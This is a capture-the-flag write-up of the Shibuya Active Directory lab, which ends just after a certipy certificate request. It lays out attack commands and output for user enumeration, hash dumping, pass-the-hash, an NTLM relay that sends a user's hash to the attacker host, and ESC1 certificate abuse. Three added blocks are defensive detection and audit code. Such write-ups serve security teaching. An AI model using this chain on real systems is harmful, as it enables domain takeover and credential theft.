HTB x VL Shibuya: Formal Write-up

Safwan Luban
Security Engineer

Synopsis:

Shibuya, a challenging hard-rated HTB x Vulnlab Active Directory box, requires a multi-stage attack chain involving credential harvesting, session hijacking, and a critical Active Directory Certificate Services (ADCS) misconfiguration. The initial foothold is gained by enumerating domain users via Kerberos and discovering a weak password for one user. This access is quickly leveraged to find a service account’s plaintext password stored in its user description, granting access to a critical SMB share. Inside the share, a Windows Imaging (.wim) file contains cached domain credentials for another user. By extracting the necessary registry hives from this image, a hash is recovered and used to reset the user’s password, enabling lateral movement to an interactive shell on the domain controller via SSH. Privilege escalation is a two-step process: first, a Cross-Session Relay attack is performed to capture and crack the hash of a high-privileged user with an active session. With these new credentials, the final pivot is made by exploiting a vulnerable ADCS certificate template (ESC1) to request a certificate as a domain administrator, ultimately yielding the administrator’s NT hash and achieving full domain compromise.


Active Recon:

The initial phase of the operation involved active reconnaissance against the target IP address, 10.10.83.243. A detailed service version scan was conducted using Nmap to identify open services and gather information about the target system’s configuration.

┌──(toothless5143㉿kali)-[~]
└─$ nmap -sV -Pn 10.10.83.243
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 13:45 +06
Nmap scan report for 10.10.83.243
Host is up (0.21s latency).
Not shown: 989 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-29 07:45:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: AWSJPDC0522; OS: Windows; CPE: cpe:/o:microsoft:windows

The scan results confirmed the host was a Windows machine operating as a domain controller. Key services such as Kerberos (port 88) and LDAP (port 3268) were active, and the LDAP banner revealed the domain name shibuya.vl and hostname AWSJPDC0522.

To ensure proper name resolution for all subsequent commands, these names were added to the local /etc/hosts file.

┌──(toothless5143㉿kali)-[~]
└─$ echo "10.10.83.243 shibuya.vl AWSJPDC0522.shibuya.vl" | sudo tee -a /etc/hosts
10.10.83.243 shibuya.vl AWSJPDC0522.shibuya.vl

With the domain name known, a user enumeration attack was performed against the Kerberos service using Kerbrute. This tool attempts to validate a list of potential usernames against the domain controller without causing account lockouts, identifying which ones exist within the domain.

┌──(toothless5143㉿kali)-[~]
└─$ kerbrute userenum --dc 10.10.83.243 -d shibuya.vl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 05/29/25 - Ronnie Flathers @ropnop

2025/05/29 13:56:57 >  Using KDC(s):
2025/05/29 13:56:57 >   10.10.83.243:88

2025/05/29 13:57:00 >  [+] VALID USERNAME:       purple@shibuya.vl
2025/05/29 13:57:04 >  [+] VALID USERNAME:       red@shibuya.vl

This process successfully identified two valid domain usernames: purple and red. These usernames became the primary targets for the next phase of credential-based attacks.


Vulnerability Analysis & Exploitation:

Having identified valid usernames, the next logical step was to test for weak or common passwords. The tool netexec was used to perform a password spray, which confirmed that the user red had a password of red. This provided the initial valid credential set.

┌──(toothless5143㉿kali)-[~]
└─$ netexec smb shibuya.vl -u red -p red -k
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)

SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
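How a defender would see the Kerbrute enumeration above and the password test that followed, as an added example that is not part of the write-up: a request for an account that does not exist is logged by the domain controller as Event ID 4768 with result code 0x6, and a wrong password for a real account as Event ID 4771 with result code 0x18. The event dicts, timestamps, names, addresses and thresholds below are constructed assumptions.

```python
"""Spot Kerberos username enumeration and password spraying in domain controller
security events. Added example; the event dicts stand in for parsed 4768/4771 events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos result codes as logged by the DC (RFC 4120 error numbers):
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768: requested account does not exist
KDC_ERR_PREAUTH_FAILED = "0x18"       # 4771: wrong password for a real account

EPOCH = datetime(1970, 1, 1)
BASE = datetime(2025, 5, 29, 7, 56, 0)   # constructed timestamp base

def _ev(offset_s, event_id, account, ip, code):
    return {"time": BASE + timedelta(seconds=offset_s), "event_id": event_id,
            "account": account, "client_ip": ip, "result_code": code}

# Constructed sample: a wordlist-driven enumeration (30 non-existent names, one
# every 3 s) followed by a spray over six real accounts, all from 10.0.0.5, plus
# one genuine typo from 10.0.0.9. Names and addresses are made up.
SAMPLE_EVENTS = (
    [_ev(3 * i, 4768, f"guess{i}", "10.0.0.5", KDC_ERR_C_PRINCIPAL_UNKNOWN)
     for i in range(30)]
    + [_ev(100 + 2 * i, 4771, acct, "10.0.0.5", KDC_ERR_PREAUTH_FAILED)
       for i, acct in enumerate(["purple", "red", "alice", "bob", "carol", "dave"])]
    + [_ev(50, 4771, "eve", "10.0.0.9", KDC_ERR_PREAUTH_FAILED),
       _ev(60, 4768, "eve", "10.0.0.9", "0x0")]
)

def detect(events, window=timedelta(minutes=5), enum_threshold=20, spray_threshold=5):
    """Findings per source IP: 'username_enumeration' when at least enum_threshold
    unknown-principal failures fall in one window, 'password_spray' when pre-auth
    fails for at least spray_threshold distinct accounts in one window.
    The thresholds are tuning assumptions, not measured values."""
    unknown = defaultdict(int)    # (ip, window index) -> count of 0x6
    preauth = defaultdict(set)    # (ip, window index) -> accounts with 0x18
    for e in events:
        key = (e["client_ip"], (e["time"] - EPOCH) // window)
        if e["event_id"] == 4768 and e["result_code"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[key] += 1
        elif e["event_id"] == 4771 and e["result_code"] == KDC_ERR_PREAUTH_FAILED:
            preauth[key].add(e["account"].lower())
    findings = []
    for (ip, _), n in unknown.items():
        if n >= enum_threshold:
            findings.append({"ip": ip, "type": "username_enumeration", "count": n})
    for (ip, _), accounts in preauth.items():
        if len(accounts) >= spray_threshold:
            findings.append({"ip": ip, "type": "password_spray",
                             "count": len(accounts), "accounts": sorted(accounts)})
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```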

With a foothold as the user red, further enumeration of domain users was conducted to gather more information. The --users flag in netexec retrieves details about domain user accounts, including their descriptions.

┌──(toothless5143㉿kali)-[~]
└─$ netexec smb shibuya.vl -u red -p red -k --users
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)

SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       <REDACTED>

This enumeration revealed a significant security misconfiguration: the password for the service account svc_autojoin was stored in plain text in its Active Directory description field, where the low-privileged user red could read it.
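An audit for the misconfiguration above, added here and not part of the write-up: it parses the same netexec --users table and flags descriptions that name a credential or contain a password-shaped token. The sample rows, the two extra service accounts and their placeholder passwords are constructed for the example.

```python
"""Audit Active Directory user description fields for credential-like text.
Added example; it reads the table `netexec smb <host> -u <user> -p <pass> --users`
prints (an LDAP export of sAMAccountName/description works the same way)."""
import math
import re

CRED_WORDS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret)\b", re.I)

# One netexec table row: the log prefix, then Username, Last PW Set, BadPW and an
# optional Description. Status lines ([*], [+]) and the header row do not match.
ROW = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+(?P<badpw>\d+)\s*(?P<desc>.*)$")

def shannon_entropy(s):
    """Bits per character; random-looking tokens score well above 3."""
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))

def looks_like_secret(description):
    """True if the text names a credential or contains a password-shaped token
    (8+ chars, letters and digits, high entropy). Heuristic: review hits by hand."""
    if CRED_WORDS.search(description):
        return True
    return any(len(tok) >= 8 and re.search(r"\d", tok) and re.search(r"[A-Za-z]", tok)
               and shannon_entropy(tok) > 3.0
               for tok in description.split())

def parse_netexec_users(output):
    """Return (username, description) pairs from the netexec --users table."""
    rows = []
    for line in output.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m["user"], m["desc"].strip()))
    return rows

def audit(output):
    """Usernames whose description should be reviewed and scrubbed."""
    return [user for user, desc in parse_netexec_users(output) if looks_like_secret(desc)]

# Constructed sample in the page's netexec layout; svc_backup, both descriptions
# and the 'passwords' are made-up placeholders.
SAMPLE_OUTPUT = r"""
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       Domain join account, password: Ex4mple-Placeh0lder
SMB         shibuya.vl      445    AWSJPDC0522      svc_backup                    2025-02-15 07:52:10 0       Temp acct Zq7!mW3pLx9
SMB         shibuya.vl      445    AWSJPDC0522      red                           2025-02-15 07:53:00 0
"""

if __name__ == "__main__":
    print(audit(SAMPLE_OUTPUT))   # ['svc_autojoin', 'svc_backup']
```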

This credential was then used to list the accessible SMB shares on the domain controller to search for sensitive files or information.

┌──(toothless5143㉿kali)-[~]
└─$ smbclient -L //shibuya.vl/ -U svc_autojoin
Password for [WORKGROUP\svc_autojoin]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        images$         Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        users           Disk

The share listing showed a share named images$. This share was accessed using the svc_autojoin credentials to investigate its contents.

┌──(toothless5143㉿kali)-[~]
└─$ smbclient //shibuya.vl/images$ -U svc_autojoin
Password for [WORKGROUP\svc_autojoin]:
Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Sun Feb 16 17:24:08 2025
  ..                                DHS        0  Wed Feb 19 18:59:37 2025
  AWSJPWK0222-01.wim                  A  8264070  Sun Feb 16 17:23:41 2025
  AWSJPWK0222-02.wim                  A 50660968  Sun Feb 16 17:23:45 2025
  AWSJPWK0222-03.wim                  A 32065850  Sun Feb 16 17:23:47 2025
  vss-meta.cab                        A   365686  Sun Feb 16 17:22:37 2025

Inside the share, several Windows Imaging Format (.wim) files were discovered. These files are disk images and can contain entire offline operating systems, including sensitive files like registry hives.


Post Exploitation:

The .wim files represented a valuable source of offline data. The file AWSJPWK0222-02.wim was chosen for analysis. Because the file was large and prone to transfer timeouts with smbclient, the entire SMB share was mounted directly to the local filesystem for reliable access. First, a directory was created to serve as the mount point.

┌──(toothless5143㉿kali)-[~]
└─$ sudo mkdir -p /mnt/images

Next, the images$ share was mounted to this directory using the svc_autojoin credentials.

┌──(toothless5143㉿kali)-[~]
└─$ sudo mount -t cifs //shibuya.vl/images$ /mnt/images -o username=svc_autojoin
Password for svc_autojoin@//shibuya.vl/images$:

Once the share was mounted, the target .wim file was copied to the local machine.

┌──(toothless5143㉿kali)-[~]
└─$ cp /mnt/images/AWSJPWK0222-02.wim .

Once mounted, the .wim file was copied locally. The contents of the image were then extracted using 7z, specifically targeting the SAM, SYSTEM, and SECURITY registry hives, which store local user credentials and system security information.

┌──(toothless5143㉿kali)-[~]
└─$ 7z e AWSJPWK0222-02.wim SAM SYSTEM SECURITY

With the registry hives extracted, impacket-secretsdump was used to parse these offline files and dump any stored credentials.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: <REDACTED>
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Dumping cached domain logon information (domain/username:hash)
SHIBUYA.VL/Simon.Watson:$DCC2$10240#Simon.Watson#<REDACTED>: (2025-02-16 11:17:56)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<REDACTED>
$MACHINE.ACC:aad3b435b51404eeaad3b435b51404ee:<REDACTED>
[*] DPAPI_SYSTEM
dpapi_machinekey:<REDACTED>
dpapi_userkey:<REDACTED>
[*] NL$KM
 0000   <REDACTED>
 0010   <REDACTED>
 0020   <REDACTED>
 0030   <REDACTED>
NL$KM:<REDACTED>
[*] Cleaning up...

This process successfully extracted the cached NTLM hash for the domain user SHIBUYA.VL\Simon.Watson. This hash provided the means for the next stage of lateral movement.


Lateral Movement:

The recovered NTLM hash for Simon.Watson was leveraged to move laterally within the network. A Pass-the-Hash attack was initiated using impacket-smbclient to authenticate to the domain controller as Simon.Watson.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-smbclient simon.watson@shibuya.vl -hashes :5d8c<REDACTED>a0d50
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# ls
drw-rw-rw-          0  Sun Feb 16 16:50:59 2025 .
drw-rw-rw-          0  Wed Feb 19 18:59:37 2025 ..
drw-rw-rw-          0  Sat Feb 15 12:49:31 2025 Administrator
drw-rw-rw-          0  Sat Feb 15 21:48:20 2025 All Users
drw-rw-rw-          0  Sat Feb 15 21:49:12 2025 Default
drw-rw-rw-          0  Sat Feb 15 21:48:20 2025 Default User
-rw-rw-rw-        174  Sat Feb 15 21:46:52 2025 desktop.ini
drw-rw-rw-          0  Wed Feb 19 01:29:42 2025 nigel.mills
drw-rw-rw-          0  Sat Feb 15 12:49:31 2025 Public
drw-rw-rw-          0  Wed Feb 19 01:36:45 2025 simon.watson

While this provided file-level access, an interactive shell was preferable. The Nmap scan had shown that SSH was open on the server, so impacket-changepasswd was used with the user's hash to reset Simon.Watson's password to a known value, Password123.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-changepasswd shibuya.vl/simon.watson@shibuya.vl -hashes :5d8c<REDACTED>a0d50 -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Changing the password of shibuya.vl\simon.watson
[*] Connecting to DCE/RPC as shibuya.vl\simon.watson
[*] Password was changed successfully.

With the password successfully changed, a standard SSH connection was established to the domain controller as simon.watson, providing an interactive command shell on the target system.

┌──(toothless5143㉿kali)-[~]
└─$ ssh simon.watson@shibuya.vl
The authenticity of host 'shibuya.vl (10.10.83.243)' can't be established.
ED25519 key fingerprint is SHA256:SiXhmjQMScl7eQgH4/uyVXXTsCHM6diy6fh80l4zzJQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shibuya.vl' (ED25519) to the list of known hosts.
simon.watson@shibuya.vl's password:
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

Privilege Escalation:

Now with interactive user-level access, the final objective was to escalate privileges to a domain administrator. Previous attempts to enumerate LDAP from the outside had failed. To overcome this, a dynamic SOCKS proxy was created through the active SSH session. This allowed tools on the attacker’s machine to route their traffic through the compromised host, as if they were running from inside the network.

┌──(toothless5143㉿kali)-[~]
└─$ ssh simon.watson@shibuya.vl -D1080 -N
simon.watson@shibuya.vl's password:

With the tunnel active, proxychains was used to run bloodhound-python. This tool comprehensively enumerates the Active Directory environment, mapping out users, groups, computers, and potential attack paths.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q bloodhound-python -u simon.watson -p Password123 -ns 10.10.83.243 -d shibuya.vl -c All --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: shibuya.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: awsjpdc0522.shibuya.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: awsjpdc0522.shibuya.vl
INFO: Found 504 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: AWSJPWK0222.shibuya.vl
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: AWSJPDC0522.shibuya.vl
WARNING: Could not resolve: AWSJPWK0222.shibuya.vl: The DNS query name does not exist: AWSJPWK0222.shibuya.vl.
INFO: Done in 00M 45S
INFO: Compressing output into 20250529155505_bloodhound.zip

The BloodHound data revealed that another user, nigel.mills, had an active session on the domain controller. This presented an opportunity for a session-based attack.

The RemotePotato0 tool was uploaded to the server to perform a Cross-Session Relay attack. This technique abuses another user's existing, legitimate logon session on the same machine: a COM object is spawned in that session, and the NTLM authentication it triggers is relayed to a server the attacker controls, which captures the NTLMv2 response. It is a specialized form of NTLM relay attack.

To make this work, a socat listener on the attacker's machine forwarded connections arriving on TCP port 135 to port 9000 on the victim, where the tool's RogueOxidResolver listens; the tool's own output describes this redirector as a required step on Windows Server versions where the JuicyPotato approach does not work.

┌──(toothless5143㉿kali)-[~]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.83.243:9000

After uploading RemotePotato0 to the server, it was executed to capture the NTLMv2 hash from nigel.mills's active session (session 1, hence -s 1).

PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.8.6.64 -x 10.8.6.64 -p 9000 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.8.6.64 to your victim machine on port 9000
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9000
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 9000 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9000
[+] User hash stolen!

NTLMv2 Client   : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash     : Nigel.Mills::SHIBUYA:<REDACTED>

The captured hash was cracked offline using hashcat and the rockyou.txt wordlist, revealing the user’s password.

┌──(toothless5143㉿kali)-[~]
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 9 6900HX with Radeon Graphics, 1438/2941 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
NIGEL.MILLS::SHIBUYA:<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
<SNIP>
Stopped: Sun Apr 20 17:59:53 2025

With the credentials for nigel.mills, further enumeration was conducted, focusing on Active Directory Certificate Services (ADCS) using netexec and certipy.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q netexec ldap shibuya.vl -u nigel.mills -p <REDACTED> -M adcs

SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.180    389    AWSJPDC0522      [+] shibuya.vl\nigel.mills:<REDACTED>
ADCS        10.10.64.180    389    AWSJPDC0522      [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.64.180    389    AWSJPDC0522      Found PKI Enrollment Server: AWSJPDC0522.shibuya.vl
ADCS        10.10.64.180    389    AWSJPDC0522      Found CN: shibuya-AWSJPDC0522-CA

The certipy scan uncovered a critical misconfiguration, ESC1, in the “ShibuyaWeb” certificate template (certipy also flagged ESC2 and ESC3 on the same template, and ESC8 on the CA's web enrollment).

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q certipy find -u nigel.mills -p <REDACTED> -dc-ip 10.10.83.243 -dns-tcp -vulnerable -enabled -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA
[!] Got error while trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via RRP
[*] Got CA configuration for 'shibuya-AWSJPDC0522-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : shibuya-AWSJPDC0522-CA
    DNS Name                            : AWSJPDC0522.shibuya.vl
    Certificate Subject                 : CN=shibuya-AWSJPDC0522-CA, DC=shibuya, DC=vl
    Certificate Serial Number           : 2417712CBD96C58449CFDA3BE3987F52
    Certificate Validity Start          : 2025-02-15 07:24:14+00:00
    Certificate Validity End            : 2125-02-15 07:34:13+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SHIBUYA.VL\Administrators
      Access Rights
        ManageCertificates              : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        ManageCa                        : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Enroll                          : SHIBUYA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : ShibuyaWeb
    Display Name                        : ShibuyaWeb
    Certificate Authorities             : shibuya-AWSJPDC0522-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Any Purpose
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 75 years
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SHIBUYA.VL\t1_admins
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SHIBUYA.VL\_admin
        Write Owner Principals          : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Dacl Principals           : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Property Principals       : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
    [!] Vulnerabilities
      ESC1                              : 'SHIBUYA.VL\\t1_admins' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'SHIBUYA.VL\\t1_admins' can enroll and template can be used for any purpose
      ESC3                              : 'SHIBUYA.VL\\t1_admins' can enroll and template has Certificate Request Agent EKU set

This template allowed any principal holding enrollment rights on it (certipy lists SHIBUYA.VL\t1_admins alongside the admin groups) to request a certificate for an arbitrary user, including a domain administrator: the “Enrollee Supplies Subject” flag was enabled, the template permitted client authentication, and neither manager approval nor authorized signatures were required.
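A check for the same ESC1 pre-conditions that certipy reports, added here as an example and not certipy's own code: it parses the template entry above, evaluates each condition, and confirms which single setting change would clear the finding. TRUSTED_ENROLLERS, and treating t1_admins as a low-privilege group, are assumptions to adapt per environment.

```python
"""Evaluate the ESC1 pre-conditions of a certificate template from the text report
`certipy find -stdout` prints. Added example, not Certipy's own code."""
import re
from dataclasses import dataclass, replace

# Assumption to adapt per environment: groups allowed to enroll in a client-auth
# template whose enrollee supplies the subject. Anything else is low privilege.
TRUSTED_ENROLLERS = {"Domain Admins", "Enterprise Admins", "Administrators"}
@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    client_auth: bool
    enrollee_supplies_subject: bool
    manager_approval: bool
    signatures_required: int
    enrollment_rights: tuple

def parse_template(report):
    """Parse one 'Certificate Templates' entry; extra Enrollment Rights principals
    sit on continuation lines without a key."""
    fields, rights, in_rights = {}, [], False
    for line in report.splitlines():
        m = re.match(r"\s*(.+?)\s{2,}:\s*(.*)$", line)
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            fields[key] = val
            in_rights = key == "Enrollment Rights"
            if in_rights and val:
                rights.append(val)
        elif in_rights and "\\" in line:
            rights.append(line.strip())   # DOMAIN\principal continuation line
        elif line.strip():
            in_rights = False             # a new sub-section starts
    yes = lambda k: fields.get(k, "False").lower() == "true"
    return Template(fields["Template Name"], yes("Enabled"), yes("Client Authentication"),
                    yes("Enrollee Supplies Subject"), yes("Requires Manager Approval"),
                    int(fields.get("Authorized Signatures Required", "0")), tuple(rights))

def esc1_conditions(t, trusted=TRUSTED_ENROLLERS):
    """Every condition that must hold for ESC1; the template is ESC1 only if all do."""
    low_priv = [r for r in t.enrollment_rights if r.split("\\")[-1] not in trusted]
    return {
        "enabled": t.enabled,
        "client_authentication_eku": t.client_auth,
        "enrollee_supplies_subject": t.enrollee_supplies_subject,
        "no_manager_approval": not t.manager_approval,
        "no_authorized_signatures": t.signatures_required == 0,
        "low_privilege_enrollers": bool(low_priv),
    }

def is_esc1(t):
    return all(esc1_conditions(t).values())

def remediation_options(t):
    """Single-setting changes that each clear ESC1 on their own (True = cleared)."""
    fixes = {
        "disable EnrolleeSuppliesSubject": replace(t, enrollee_supplies_subject=False),
        "require manager approval": replace(t, manager_approval=True),
        "restrict Enrollment Rights to trusted groups": replace(
            t, enrollment_rights=tuple(r for r in t.enrollment_rights
                                       if r.split("\\")[-1] in TRUSTED_ENROLLERS)),
    }
    return {label: not is_esc1(fixed) for label, fixed in fixes.items()}

# Constructed excerpt in Certipy's layout mirroring the ShibuyaWeb listing above,
# including a continuation line that the page's extraction spilled to column 0.
SAMPLE_REPORT = r"""
    Template Name                       : ShibuyaWeb
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
        Enrollment Rights               : SHIBUYA.VL\t1_admins
                                          SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
      Object Control Permissions
"""
```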

This vulnerability was exploited by requesting a certificate for the user _admin using the ShibuyaWeb template.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -dc-ip 10.10.83.243 -target shibuya.vl -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -key-size 4096

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
